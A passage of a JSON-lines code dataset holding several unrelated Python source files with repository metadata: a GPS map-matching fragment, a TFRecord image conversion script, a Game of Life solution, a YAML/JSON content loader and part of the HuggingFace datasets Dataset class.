node_id+1)\n\t\t\t# candidate_edges.append(point_tuple_in)\n\t\t\t# candidate_edges.append(point_tuple_out)\n\n\t\tcandidate_edges = list(OrderedDict.fromkeys(candidate_edges))\n\n\t\treturn candidate_edges\n\n\t\t# candidate_edges = []\n\t\t# for node_id in self.get_candidate_nodes(odom_point):\n\t\t# \t# first node\n\t\t# \tif node_id == 0:\n\t\t# \t\tpoint_tuple_out = (node_id, node_id+1)\n\t\t# \t\tcandidate_edges.append(point_tuple_out)\n\t\t# \t# last node\n\t\t# \telif node_id == len(self.nodes_gdf)-1:\n\t\t# \t point_tuple_in = (node_id-1, node_id)\n\t\t# \t candidate_edges.append(point_tuple_in)\n\t\t# \t# any other node\n\t\t# \telse:\n\t\t# \t point_tuple_in = (node_id-1, node_id)\n\t\t# \t point_tuple_out = (node_id, node_id+1)\n\t\t# \t candidate_edges.append(point_tuple_in)\n\t\t# \t candidate_edges.append(point_tuple_out)\n\n\t\t# candidate_edges = list(OrderedDict.fromkeys(candidate_edges))\n\n\t# def get_candidate_nodes(self, odom_point):\n\t# \twhile True:\n\t# \t\tcircle = odom_point.buffer(self.search_radius) \n\t# \t\tpossible_matches_index = list(self.nodes_spatial_index.intersection((circle.bounds))) \n\t# \t\tpossible_matches = self.nodes_gdf.iloc[possible_matches_index] \n\t# \t\tprecise_matches = possible_matches[possible_matches.intersects(circle)]\n\t# \t\tcandidate_nodes = list(precise_matches.index)\n\n\t# \t\tif len(candidate_nodes) != 0:\n\t# \t\t\tbreak\n\t# \t\telse:\n\t# \t\t\t# rospy.loginfo(self.search_radius)\n\t# \t\t\tself.search_radius += 5\n\n\t# \treturn candidate_nodes\n","repo_name":"BLue1881euLB/gps2road","sub_path":"gps_road_estimation-master/src/map_match.py","file_name":"map_match.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33386112839","text":"r\"\"\"Downloads and converts Flowers data to TFRecords of TF-Example protos.\n\nThis module downloads the Flowers data, uncompresses it, reads the files\nthat make up the Flowers data and creates two TFRecord datasets: one for train\nand one for test. Each TFRecord dataset is comprised of a set of TF-Example\nprotocol buffers, each of which contain a single image and label.\n\nThe script should take about a minute to run.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport random\nimport sys\nimport csv\nimport tensorflow as tf\nimport cv2\nfrom datasets import dataset_utils\n\n# The number of images in the validation set.\n_NUM_VALIDATION = 40000\n\n# Seed for repeatability.\n_RANDOM_SEED = 0\n\n# The number of shards per dataset split.\n_NUM_SHARDS = 5\n\n\nclass ImageReader(object):\n \"\"\"Helper class that provides TensorFlow image coding utilities.\"\"\"\n\n def __init__(self):\n # Initializes function that decodes RGB JPEG data.\n self._decode_png_data = tf.placeholder(dtype=tf.string)\n self._decode_png = tf.image.decode_png(self._decode_png_data, channels=3)\n\n def read_image_dims(self, sess, image_data):\n image = self.decode_png(sess, image_data)\n return image.shape[0], image.shape[1]\n\n def decode_png(self, sess, image_data):\n image = sess.run(self._decode_png,\n feed_dict={self._decode_png_data: image_data})\n assert len(image.shape) == 3\n assert image.shape[2] == 3\n return image\n\n\ndef _get_filenames_and_classes(dataset_dir, split_name):\n \"\"\"Returns a list of filenames and inferred class names.\n\n Args:\n dataset_dir: A directory containing a set of subdirectories representing\n class names. Each subdirectory should contain PNG or JPG encoded images.\n\n Returns:\n A list of image file paths, relative to `dataset_dir` and the list of\n subdirectories, representing class names.\n \"\"\"\n annotations_root = os.path.join(dataset_dir, 'labels')\n images_root = os.path.join(dataset_dir, 'images')\n split_file = os.path.join(annotations_root, split_name)\n file_names = []\n labels = []\n counter = 0\n with open(split_file + '.txt') as csvFile:\n read_object = csv.reader(csvFile, delimiter= ' ')\n for row in read_object:\n print(row[0])\n abs_file = os.path.join(images_root, row[0])\n # file_names.append(abs_file)\n image = cv2.imread(abs_file)\n new_name = row[0].split('.')[0]\n final_image_name = os.path.join(images_root, new_name + '.png')\n print(final_image_name)\n print(cv2.imwrite(final_image_name, image))\n file_names.append(final_image_name)\n labels.append(int(row[1]))\n return file_names, labels\n\ndef _get_dataset_filename(dataset_dir, split_name, shard_id):\n output_filename = 'documents_%s_%05d-of-%05d.tfrecord' % (\n split_name, shard_id, _NUM_SHARDS)\n return os.path.join(dataset_dir, output_filename)\n\ndef _convert_dataset(split_name, image_names, image_labels, dataset_dir):\n \"\"\"Converts the given filenames to a TFRecord dataset.\n\n Args:\n split_name: The name of the dataset, either 'train' or 'validation'.\n filenames: A list of absolute paths to png or jpg images.\n class_names_to_ids: A dictionary from class names (strings) to ids\n (integers).\n dataset_dir: The directory where the converted datasets are stored.\n \"\"\"\n filenames = image_names\n assert split_name in ['train', 'val']\n\n num_per_shard = int(math.ceil(len(filenames) / float(_NUM_SHARDS)))\n\n with tf.Graph().as_default():\n image_reader = ImageReader()\n\n with tf.Session('') as sess:\n\n for shard_id in range(_NUM_SHARDS):\n output_filename = _get_dataset_filename(\n dataset_dir, split_name, shard_id)\n\n with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:\n start_ndx = shard_id * num_per_shard\n end_ndx = min((shard_id+1) * num_per_shard, len(filenames))\n for i in range(start_ndx, end_ndx):\n sys.stdout.write('\\r>> Converting image %d/%d shard %d' % (\n i+1, len(filenames), shard_id))\n sys.stdout.flush()\n\n # Read the filename:\n print (filenames[i])\n image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()\n height, width = image_reader.read_image_dims(sess, image_data)\n\n class_id = int(image_labels[i])\n\n example = dataset_utils.image_to_tfexample(\n image_data, b'png', height, width, class_id)\n tfrecord_writer.write(example.SerializeToString())\n\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\ndef _get_labels_map(dataset_dir):\n \"\"\"Returns a list of filenames and inferred class names.\n\n Args:\n dataset_dir: A directory containing a set of subdirectories representing\n class names. Each subdirectory should contain PNG or JPG encoded images.\n\n Returns:\n A list of image file paths, relative to `dataset_dir` and the list of\n subdirectories, representing class names.\n \"\"\"\n dataset_root = dataset_dir\n labels_map_file = os.path.join(dataset_root,'labels', 'label_map.txt')\n label_id = []\n label_name = []\n\n with open(labels_map_file) as csvFile:\n read_object = csv.reader(csvFile, delimiter= ' ')\n for row in read_object:\n label_id.append(int(row[0]))\n label_name.append(row[1])\n return label_name, label_id\n\n\ndef run(dataset_dir):\n \"\"\"Runs the download and conversion operation.\n\n Args:\n dataset_dir: The dataset directory where the dataset is stored.\n \"\"\"\n tf_record_directory = dataset_dir\n if not tf.gfile.Exists(tf_record_directory):\n tf.gfile.MakeDirs(tf_record_directory)\n\n # dataset_utils.download_and_uncompress_tarball(_DATA_URL, dataset_dir)\n image_names, image_labels = _get_filenames_and_classes(dataset_dir, split_name='train')\n class_names, class_id = _get_labels_map(dataset_dir)\n print(class_names)\n class_names_to_ids = dict(zip(class_names, class_id))\n _convert_dataset(split_name = 'train', dataset_dir = tf_record_directory, image_names = image_names, image_labels = image_labels)\n\n image_names, image_labels = _get_filenames_and_classes(dataset_dir, split_name='val')\n class_names, class_id = _get_labels_map(dataset_dir)\n print(class_names)\n #class_names_to_ids = dict(zip(class_names, class_id))\n _convert_dataset(split_name = 'val', dataset_dir = tf_record_directory, image_names = image_names, image_labels = image_labels)\n\n # Finally, write the labels file:\n labels_to_class_names = dict((v, k) for k, v in class_names_to_ids.items())\n dataset_utils.write_label_file(labels_to_class_names, dataset_dir)\n print('\\nFinished converting the documents dataset!')\n","repo_name":"sunsided/cb","sub_path":"datasets/convert_document_images.py","file_name":"convert_document_images.py","file_ext":"py","file_size_in_byte":6739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41957060781","text":"from typing import List\n\nclass Solution:\n '''\n LeetCode Monthly Challenge problem for December 30th, 2020.\n '''\n def gameOfLife(self, board: List[List[int]]) -> None:\n '''\n Background reading: John Horton Conway's Game of Life.\n \n Given an M x N grid of cells, modifies the board in-place to the next\n state. A live cell is represented by 1, and a dead cell is prepresented\n by a 0. A cell's next state is determined by the following rules:\n \n Any live cell with fewer than two live neighbors dies\n Any live cell with two or three live neighbors lives\n Any live cell with more than three live neighbors dies\n Any dead cell with exactly three live neighbors becomes a live cell\n \n Constraints:\n m == len(board)\n n == len(board[i])\n 1 <= m, n <= 25\n board[i][j] is 0 or 1\n \n Params:\n board - A list of binary lists.\n \n Returns:\n None - Board is modified in-place to the next state.\n \n Examples:\n Below are examples of boards and their next state:\n \n [[0,1,0], [[0,0,0],\n [0,0,1], -> [1,0,1],\n [1,1,1], [0,1,1],\n [0,0,0]] [0,1,0]]\n \n \n [[1,1], [[1,1],\n [1,0]] -> [1,1]]\n '''\n if not len(board) or not len(board[0]):\n return\n \n for row in board:\n if len(row) != len(board[0]):\n return\n \n m = len(board)\n n = len(board[0])\n \n # Visit each cell of board\n for row in range(m):\n for col in range(n):\n \n # check rightmost neighbor of current cell and\n # all neighbors below current cell\n for y, x in [(0,1),(1,-1),(1,0),(1,1)]:\n if 0 <= col + x < n and row + y < m:\n board[row][col] += 2 * (board[row+y][col+x] % 2)\n board[row+y][col+x] += 2 * (board[row][col] % 2)\n \n if 5 <= board[row][col] <= 7:\n board[row][col] = 1\n else:\n board[row][col] = 0\n","repo_name":"Hilldrupca/LeetCode","sub_path":"python/Monthly/Dec2020/gameoflife.py","file_name":"gameoflife.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4277146706","text":"# coding: utf-8\n'''\nContent discovery and provision.\n'''\n\nimport os\nimport yaml\nimport json\nimport canvas as cv\nimport canvas.ext as cve\n\nfrom json import JSONDecodeError as JSONParserError\nfrom yaml.parser import ParserError as YAMLParserError\n\nfrom .exceptions import NoSuchContent, ContentSyntaxError\n\nlog = cv.logger(__name__)\n\nclass ParserError(JSONParserError, YAMLParserError): pass\n\nclass Content:\n\tinstances = dict()\n\n\tdef __init__(self, typ, content, page_description):\n\t\tself.type, self.content = typ, content\n\t\tself.page_description = page_description\n\n\t@classmethod\n\tdef create(cls, name, content_data):\n\t\tdef attributize(item):\n\t\t\tif isinstance(item, dict):\n\t\t\t\tfor key, value in item.items():\n\t\t\t\t\titem[key] = attributize(value)\n\t\t\t\titem = cve.AttributedDict(item)\n\t\t\telif isinstance(item, (list, tuple)):\n\t\t\t\tfor i, value in enumerate(item):\n\t\t\t\t\titem[i] = attributize(value)\n\t\t\treturn item\n\n\t\tinstance = Content(\n\t\t\tcontent_data.get('type'), \n\t\t\tattributize(content_data['content']),\n\t\t\tcontent_data.get('page_description')\n\t\t)\n\t\tcls.instances[name] = instance\n\t\treturn instance\n\n\t@classmethod\n\tdef get(cls, name):\n\t\tif cv.config.development.debug:\n\t\t\toccur = cv.get_path('content', '%s.yaml'%name)\n\t\t\tparser = yaml.load\n\t\t\tif not occur:\n\t\t\t\toccur = cv.get_path('content', '%s.json'%name)\n\t\t\t\tparser = json.load\n\t\t\t\tif not occur:\n\t\t\t\t\traise NoSuchContent(name)\n\n\t\t\twith open(occur) as content_file:\n\t\t\t\treturn Content.create(name, parser(content_file))\n\n\t\tif name not in cls.instances:\n\t\t\traise NoSuchContent(name)\n\n\t\treturn cls.instances[name]\n\n\t@classmethod\n\tdef items(cls):\n\t\treturn cls.instances.items()\n\ndef get_content(content_key):\n\treturn Content.get(content_key).content\n\n@cv.on_init\ndef load_contents():\n\tlog.info('Finding static content...')\n\tfor content_dir in cve.get_path_occurrences('content', is_dir=True):\n\t\tfor filename in os.listdir(content_dir):\n\t\t\tcontent_name, ext = filename.split('.')\n\t\t\tif ext == 'yaml':\n\t\t\t\tparser = yaml.load\n\t\t\telif ext == 'json':\n\t\t\t\tparser = json.load\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\twith open(os.path.join(content_dir, filename)) as content_file:\n\t\t\t\ttry:\n\t\t\t\t\tloaded_content = parser(content_file)\n\t\t\t\texcept ParserError as ex:\n\t\t\t\t\traise ContentSyntaxError(str(ex)) from None\n\t\t\t\tContent.create(content_name, loaded_content)\n\n\tlog.info('\\n'.join((\n\t\t'Loaded content:', *(item[0] for item in Content.items())\n\t)))\n","repo_name":"robinsax/canvas-plugin-multirepo","sub_path":"cvpl-cms/cms/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2341005760","text":"import contextlib\nimport json\nimport os\nimport pickle\nimport shutil\nimport tempfile\nfrom collections import defaultdict\nfrom collections.abc import Iterable, Mapping\nfrom dataclasses import asdict\nfrom functools import partial, wraps\nfrom math import ceil, floor\nfrom multiprocessing import Pool, RLock\nfrom typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nfrom tqdm.auto import tqdm\n\nfrom .arrow_reader import ArrowReader\nfrom .arrow_writer import ArrowWriter, TypedSequence\nfrom .features import Features, Value, cast_to_python_objects, pandas_types_mapper\nfrom .fingerprint import fingerprint, generate_fingerprint, update_fingerprint\nfrom .info import DatasetInfo\nfrom .search import IndexableMixin\nfrom .splits import NamedSplit\nfrom .utils import map_nested\nfrom .utils.logging import WARNING, get_logger, get_verbosity, set_verbosity_warning\n\n\nif TYPE_CHECKING:\n from .dataset_dict import DatasetDict\n\nlogger = get_logger(__name__)\n\nif int(pa.__version__.split(\".\")[0]) == 0:\n PYARROW_V0 = True\nelse:\n PYARROW_V0 = False\n\n\nclass DatasetInfoMixin(object):\n \"\"\"This base class exposes some attributes of DatasetInfo\n at the base level of the Dataset for easy access.\n \"\"\"\n\n def __init__(self, info: DatasetInfo, split: Optional[NamedSplit]):\n self._info = info\n self._split = split\n\n @property\n def info(self):\n \"\"\" :class:`datasets.DatasetInfo` object containing all the metadata in the dataset.\"\"\"\n return self._info\n\n @property\n def split(self):\n \"\"\" :class:`datasets.DatasetInfo` object containing all the metadata in the dataset.\"\"\"\n return self._split\n\n @property\n def builder_name(self) -> str:\n return self._info.builder_name\n\n @property\n def citation(self) -> str:\n return self._info.citation\n\n @property\n def config_name(self) -> str:\n return self._info.config_name\n\n @property\n def dataset_size(self) -> Optional[int]:\n return self._info.dataset_size\n\n @property\n def description(self) -> str:\n return self._info.description\n\n @property\n def download_checksums(self) -> Optional[dict]:\n return self._info.download_checksums\n\n @property\n def download_size(self) -> Optional[int]:\n return self._info.download_size\n\n @property\n def features(self) -> Features:\n return self._info.features\n\n @property\n def homepage(self) -> Optional[str]:\n return self._info.homepage\n\n @property\n def license(self) -> Optional[str]:\n return self._info.license\n\n @property\n def size_in_bytes(self) -> Optional[int]:\n return self._info.size_in_bytes\n\n @property\n def supervised_keys(self):\n return self._info.supervised_keys\n\n @property\n def version(self):\n return self._info.version\n\n\nclass DatasetTransformationNotAllowedError(Exception):\n pass\n\n\ndef transmit_format(func):\n \"\"\"Wrapper for dataset transforms that are not in-place to transmit the format of the original dataset to the new dataset\"\"\"\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if args:\n self: \"Dataset\" = args[0]\n args = args[1:]\n else:\n self: \"Dataset\" = kwargs.pop(\"self\")\n # don't use self.format since it returns a list of columns for 'columns' even if self_format_columns is None\n new_format = {\n \"type\": self._format_type,\n \"format_kwargs\": self._format_kwargs,\n \"columns\": self._format_columns,\n \"output_all_columns\": self._output_all_columns,\n }\n out: Union[\"Dataset\", \"DatasetDict\"] = func(self, *args, **kwargs)\n if new_format[\"columns\"] is not None:\n new_format[\"columns\"] = list(set(new_format[\"columns\"]) & set(out.column_names))\n datasets: List[\"Dataset\"] = list(out.values()) if isinstance(out, dict) else [out]\n for dataset in datasets:\n out_format = {\n \"type\": dataset._format_type,\n \"format_kwargs\": dataset._format_kwargs,\n \"columns\": dataset._format_columns,\n \"output_all_columns\": dataset._output_all_columns,\n }\n if out_format != new_format:\n dataset.set_format(**new_format)\n return out\n\n wrapper._decorator_name_ = \"transmit_format\"\n return wrapper\n\n\nclass Dataset(DatasetInfoMixin, IndexableMixin):\n \"\"\"A Dataset backed by an Arrow table or Record Batch.\"\"\"\n\n def __init__(\n self,\n arrow_table: pa.Table,\n data_files: Optional[List[dict]] = None,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n indices_table: Optional[pa.Table] = None,\n indices_data_files: Optional[List[dict]] = None,\n fingerprint: Optional[str] = None,\n inplace_history: Optional[List[dict]] = None,\n ):\n info = info.copy() if info is not None else DatasetInfo()\n DatasetInfoMixin.__init__(self, info=info, split=split)\n IndexableMixin.__init__(self)\n self._data: pa.Table = arrow_table\n self._indices: Optional[pa.Table] = indices_table\n self._data_files: List[dict] = data_files if data_files is not None else []\n self._indices_data_files: List[dict] = indices_data_files if indices_data_files is not None else []\n self._inplace_history: List[dict] = (\n inplace_history\n if inplace_history is not None\n else [{\"transforms\": []} for _ in range(len(self._data_files))]\n )\n self._format_type: Optional[str] = None\n self._format_kwargs: dict = {}\n self._format_columns: Optional[list] = None\n self._output_all_columns: bool = False\n self._fingerprint: str = fingerprint\n\n # Read metadata\n\n if self._data.schema.metadata is not None and \"huggingface\".encode(\"utf-8\") in self._data.schema.metadata:\n metadata = json.loads(self._data.schema.metadata[\"huggingface\".encode(\"utf-8\")].decode())\n if \"info\" in metadata and self.info.features is None: # try to load features from the arrow file metadata\n self._info.features = DatasetInfo.from_dict(metadata[\"info\"]).features\n if (\n \"fingerprint\" in metadata and self._fingerprint is None\n ): # try to load fingerprint from the arrow file metadata\n self._fingerprint = metadata[\"fingerprint\"]\n\n # Infer features if None\n\n inferred_features = Features.from_arrow_schema(arrow_table.schema)\n if self.info.features is None:\n self.info.features = inferred_features\n\n # Infer fingerprint if None\n\n if self._fingerprint is None:\n self._fingerprint = generate_fingerprint(self)\n\n # Sanity checks\n\n assert self.features is not None, \"Features can't be None in a Dataset object\"\n assert self._fingerprint is not None, \"Fingerprint can't be None in a Dataset object\"\n if self.info.features.type != inferred_features.type:\n raise ValueError(\n \"External features info don't match the dataset:\\nGot\\n{}\\nwith type\\n{}\\n\\nbut expected something like\\n{}\\nwith type\\n{}\".format(\n self.info.features, self.info.features.type, inferred_features, inferred_features.type\n )\n )\n\n if self._indices is not None:\n assert pa.types.is_unsigned_integer(\n self._indices.column(0)[0].type\n ), f\"indices must be an Arrow table of unsigned integers, current type is {self._indices.column(0)[0].type}\"\n\n @classmethod\n def from_file(\n cls,\n filename: str,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n indices_filename: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\" Instantiate a Dataset backed by an Arrow table at filename \"\"\"\n mmap = pa.memory_map(filename)\n f = pa.ipc.open_stream(mmap)\n pa_table = f.read_all()\n data_files = [{\"filename\": filename}]\n\n if indices_filename is not None:\n indices_mmap = pa.memory_map(indices_filename)\n indices_f = pa.ipc.open_stream(indices_mmap)\n indices_pa_table = indices_f.read_all()\n indices_data_files = [{\"filename\": indices_filename}]\n else:\n indices_pa_table = None\n indices_data_files = None\n\n return cls(\n arrow_table=pa_table,\n data_files=data_files,\n info=info,\n split=split,\n indices_table=indices_pa_table,\n indices_data_files=indices_data_files,\n )\n\n @classmethod\n def from_buffer(\n cls,\n buffer: pa.Buffer,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n indices_buffer: Optional[pa.Buffer] = None,\n ) -> \"Dataset\":\n \"\"\" Instantiate a Dataset backed by an Arrow buffer \"\"\"\n mmap = pa.BufferReader(buffer)\n f = pa.ipc.open_stream(mmap)\n pa_table = f.read_all()\n\n if indices_buffer is not None:\n indices_mmap = pa.BufferReader(indices_buffer)\n indices_f = pa.ipc.open_stream(indices_mmap)\n indices_pa_table = indices_f.read_all()\n else:\n indices_pa_table = None\n\n return cls(pa_table, info=info, split=split, indices_table=indices_pa_table)\n\n @classmethod\n def from_pandas(\n cls,\n df: pd.DataFrame,\n features: Optional[Features] = None,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n ) -> \"Dataset\":\n \"\"\"\n Convert :obj:``pandas.DataFrame`` to a \"obj\"``pyarrow.Table`` to create a :obj:``datasets.Dataset``.\n\n The column types in the resulting Arrow Table are inferred from the dtypes of the pandas.Series in the DataFrame. In the case of non-object\n Series, the NumPy dtype is translated to its Arrow equivalent. In the case of `object`, we need to guess the datatype by looking at the\n Python objects in this Series.\n\n Be aware that Series of the `object` dtype don't carry enough information to always lead to a meaningful Arrow type. In the case that\n we cannot infer a type, e.g. because the DataFrame is of length 0 or the Series only contains None/nan objects, the type is set to\n null. This behavior can be avoided by constructing explicit features and passing it to this function.\n\n Args:\n df (:obj:``pandas.DataFrame``): the dataframe that contains the dataset.\n features (:obj:``datasets.Features``, `optional`, defaults to :obj:``None``): If specified, the features types of the dataset\n info (:obj:``datasets.DatasetInfo``, `optional`, defaults to :obj:``None``): If specified, the dataset info containing info like\n description, citation, etc.\n split (:obj:``datasets.NamedSplit``, `optional`, defaults to :obj:``None``): If specified, the name of the dataset split.\n \"\"\"\n if info is not None and features is not None and info.features != features:\n raise ValueError(\n \"Features specified in `features` and `info.features` can't be different:\\n{}\\n{}\".format(\n features, info.features\n )\n )\n features = features if features is not None else info.features if info is not None else None\n if info is None:\n info = DatasetInfo()\n info.features = features\n pa_table: pa.Table = pa.Table.from_pandas(\n df=df, schema=pa.schema(features.type) if features is not None else None\n )\n return cls(pa_table, info=info, split=split)\n\n @classmethod\n def from_dict(\n cls,\n mapping: dict,\n features: Optional[Features] = None,\n info: Optional[Any] = None,\n split: Optional[Any] = None,\n ) -> \"Dataset\":\n \"\"\"\n Convert :obj:``dict`` to a \"obj\"``pyarrow.Table`` to create a :obj:``datasets.Dataset``.\n\n Args:\n mapping (:obj:``mapping``): A mapping of strings to Arrays or Python lists.\n features (:obj:``datasets.Features``, `optional`, defaults to :obj:``None``): If specified, the features types of the dataset\n info (:obj:``datasets.DatasetInfo``, `optional`, defaults to :obj:``None``): If specified, the dataset info containing info like\n description, citation, etc.\n split (:obj:``datasets.NamedSplit``, `optional`, defaults to :obj:``None``): If specified, the name of the dataset split.\n \"\"\"\n if info is not None and features is not None and info.features != features:\n raise ValueError(\n \"Features specified in `features` and `info.features` can't be different:\\n{}\\n{}\".format(\n features, info.features\n )\n )\n features = features if features is not None else info.features if info is not None else None\n if info is None:\n info = DatasetInfo()\n info.features = features\n if features is not None:\n mapping = features.encode_batch(mapping)\n else:\n mapping = cast_to_python_objects(mapping)\n mapping = {\n col: TypedSequence(data, type=features.type[col].type if features is not None else None)\n for col, data in mapping.items()\n }\n pa_table: pa.Table = pa.Table.from_pydict(mapping=mapping)\n return cls(pa_table, info=info, split=split)\n\n def __getstate__(self):\n state = dict(self.__dict__)\n state[\"_info\"] = json.dumps(asdict(state[\"_info\"]))\n state[\"_split\"] = str(state[\"_split\"]) if state[\"_split\"] is not None else None\n if self._data_files:\n state[\"_data\"] = None\n if self._indices_data_files:\n state[\"_indices\"] = None\n return state\n\n def __setstate__(self, state):\n assert (\n state.get(\"_data\") is not None or state.get(\"_data_files\") is not None\n ), \"tried to unpickle a dataset without arrow_table or data_files\"\n state = dict(state)\n state[\"_info\"] = DatasetInfo.from_dict(json.loads(state[\"_info\"]))\n state[\"_split\"] = NamedSplit(state[\"_split\"]) if state[\"_split\"] is not None else None\n self.__dict__ = state\n reader = ArrowReader(\"\", self.info)\n # Read arrow tables\n if self._data is None and self._data_files:\n tables = []\n for data_file, inplace_hist_per_file in zip(self._data_files, self._inplace_history):\n # Replay in-place history of transforms (cast_, rename_column_, etc.)\n pa_table = reader._read_files([data_file])\n sub_dataset = Dataset(pa_table, fingerprint=\"\")\n for inplace_transform_name, args, kwargs in inplace_hist_per_file[\"transforms\"]:\n getattr(sub_dataset, inplace_transform_name)(*args, **kwargs)\n tables.append(sub_dataset._data)\n tables = [t for t in tables if len(t) > 0]\n # fix all-empty tables\n tables = tables or [pa.Table.from_batches([], schema=pa.schema(self.info.features.type))]\n self._data = pa.concat_tables(tables)\n reader = ArrowReader(\"\", DatasetInfo(features=Features({\"indices\": Value(\"int64\")})))\n if self._indices is None and self._indices_data_files:\n self._indices = reader._read_files(self._indices_data_files)\n\n def save_to_disk(self, dataset_path: str):\n \"\"\"\n Save the dataset in a dataset directory\n\n Args:\n dataset_path (``str``): path of the dataset directory where the dataset will be saved to\n \"\"\"\n assert (\n not self.list_indexes()\n ), \"please remove all the indexes using `dataset.drop_index` before saving a dataset\"\n self = pickle.loads(pickle.dumps(self))\n os.makedirs(dataset_path, exist_ok=True)\n # Write indices if needed\n if self._indices is not None:\n if not self._indices_data_files:\n cache_file_name = os.path.join(dataset_path, \"indices.arrow\")\n writer = ArrowWriter(path=cache_file_name)\n writer.write_table(self._indices)\n writer.finalize()\n self._indices_data_files = [{\"filename\": cache_file_name}]\n # Write dataset if needed\n if not self._data_files or any(len(h[\"transforms\"]) > 0 for h in self._inplace_history):\n cache_file_name = os.path.join(dataset_path, \"dataset.arrow\")\n writer = ArrowWriter(path=cache_file_name)\n writer.write_table(self._data)\n writer.finalize()\n self._data_files = [{\"filename\": cache_file_name}]\n self._inplace_history = [{\"transforms\": []}]\n # Copy all files into the dataset directory\n for data_file in self._data_files + self._indices_data_files:\n # Copy file to destination directory\n src = data_file[\"filename\"]\n filename = src.split(\"/\")[-1]\n dest = os.path.join(dataset_path, filename)\n if src != dest:\n shutil.copy(src, dest)\n # Change path to relative path from inside the destination directory\n data_file[\"filename\"] = filename\n # Get state\n state = self.__getstate__()\n dataset_info = json.loads(state.pop(\"_info\"))\n assert state.get(\"_data\") is None, \"arrow table needs to be memory mapped\"\n assert state.get(\"_indices\") is None, \"arrow table needs to be memory mapped\"\n assert all(\n len(h[\"transforms\"]) == 0 for h in state.get(\"_inplace_history\", [])\n ), \"in-place history needs to be empty\"\n # Serialize state\n with open(os.path.join(dataset_path, \"state.json\"), \"w\") as state_file:\n json.dump(state, state_file, indent=2, sort_keys=True)\n with open(os.path.join(dataset_path, \"dataset_info.json\"), \"w\") as dataset_info_file:\n json.dump(dataset_info, dataset_info_file, indent=2, sort_keys=True)\n logger.info(\"Dataset saved in {}\".format(dataset_path))\n\n @staticmethod\n def load_from_disk(dataset_path: str) -> \"Dataset\":\n \"\"\"Load the dataset from a dataset directory\n\n Args:\n dataset_path (``str``): path of the dataset directory where the dataset will be loaded from\n \"\"\"\n with open(os.path.join(dataset_path, \"state.json\"), \"r\") as state_file:\n state = json.load(state_file)\n with open(os.path.join(dataset_path, \"dataset_info.json\"), \"r\") as dataset_info_file:\n dataset_info = json.load(dataset_info_file)\n state[\"_info\"] = json.dumps(dataset_info)\n dataset = Dataset.from_dict({})\n state = {k: state[k] for k in dataset.__dict__.keys()} # in case we add new fields\n # Change path to absolute path\n for data_file in state.get(\"_data_files\", []) + state.get(\"_indices_data_files\", []):\n data_file[\"filename\"] = os.path.join(dataset_path, data_file[\"filename\"])\n dataset.__setstate__(state)\n return dataset\n\n @property\n def data(self) -> pa.Table:\n \"\"\"The Apache Arrow table backing the dataset.\"\"\"\n return self._data\n\n @property\n def cache_files(self):\n \"\"\"The cache file containing the Apache Arrow table backing the dataset.\"\"\"\n return self._data_files\n\n @property\n def num_columns(self) -> int:\n \"\"\"Number of columns in the dataset.\"\"\"\n return self._data.num_columns\n\n @property\n def num_rows(self) -> int:\n \"\"\"Number of rows in the dataset (same as :func:`datasets.Dataset.__len__`).\"\"\"\n if self._indices is not None:\n return self._indices.num_rows\n return self._data.num_rows\n\n @property\n def column_names(self) -> List[str]:\n \"\"\"Names of the columns in the dataset. \"\"\"\n return self._data.column_names\n\n @property\n def shape(self) -> Tuple[int]:\n \"\"\"Shape of the dataset (number of columns, number of rows).\"\"\"\n if self._indices is not None:\n return tuple(self._indices.num_rows, self._data.num_columns)\n return self._data.shape\n\n def unique(self, column: str) -> List[Any]:\n \"\"\"Return a list of the unique elements in a column.\n\n This is implemented in the low-level backend and as such, very fast.\n\n Args:\n column (:obj:`str`):\n column name (list all the column names with :func:`datasets.Dataset.column_names`)\n\n Returns: :obj:`list` of unique elements in the given column.\n\n \"\"\"\n if column not in self._data.column_names:\n raise ValueError(f\"Column ({column}) not in table columns ({self._data.column_names}).\")\n\n if self._indices is not None and self._indices.num_rows != self._data.num_rows:\n raise ValueError(\n f\"This dataset is a shallow copy using an indices mapping of another Datset {self._data.num_rows}.\"\n f\"The `Dataset.unique()` method is currently not handled on shallow copy. Please use `Dataset.flatten_indices()` \"\n f\"to create a deep copy of the dataset and be able to use `Dataset.unique()`.\"\n )\n\n return self._data.column(column).unique().to_pylist()\n\n @fingerprint(inplace=True)\n def dictionary_encode_column_(self, column: str):\n \"\"\"Dictionary encode a column.\n\n Dictionary encode can reduce the size of a column with many repetitions (e.g. string labels columns)\n by storing a dictionary of the strings. This only affect the internal storage.\n\n Args:\n column (:obj:`str`):\n\n \"\"\"\n if column not in self._data.column_names:\n raise ValueError(f\"Column ({column}) not in table columns ({self._data.column_names}).\")\n casted_schema: pa.Schema = self._data.schema\n field_index = casted_schema.get_field_index(column)\n field: pa.Field = casted_schema.field(field_index)\n casted_field = pa.field(field.name, pa.dictionary(pa.int32(), field.type), nullable=False)\n casted_schema.set(field_index, casted_field)\n self._data = self._data.cast(casted_schema)\n self.info.features = Features.from_arrow_schema(self._data.schema)\n\n @fingerprint(inplace=True)\n def flatten_(self, max_depth=16):\n \"\"\"Flatten the Table.\n Each column with a struct type is flattened into one column per struct field.\n Other columns are left unchanged.\n \"\"\"\n for depth in range(1, max_depth):\n if 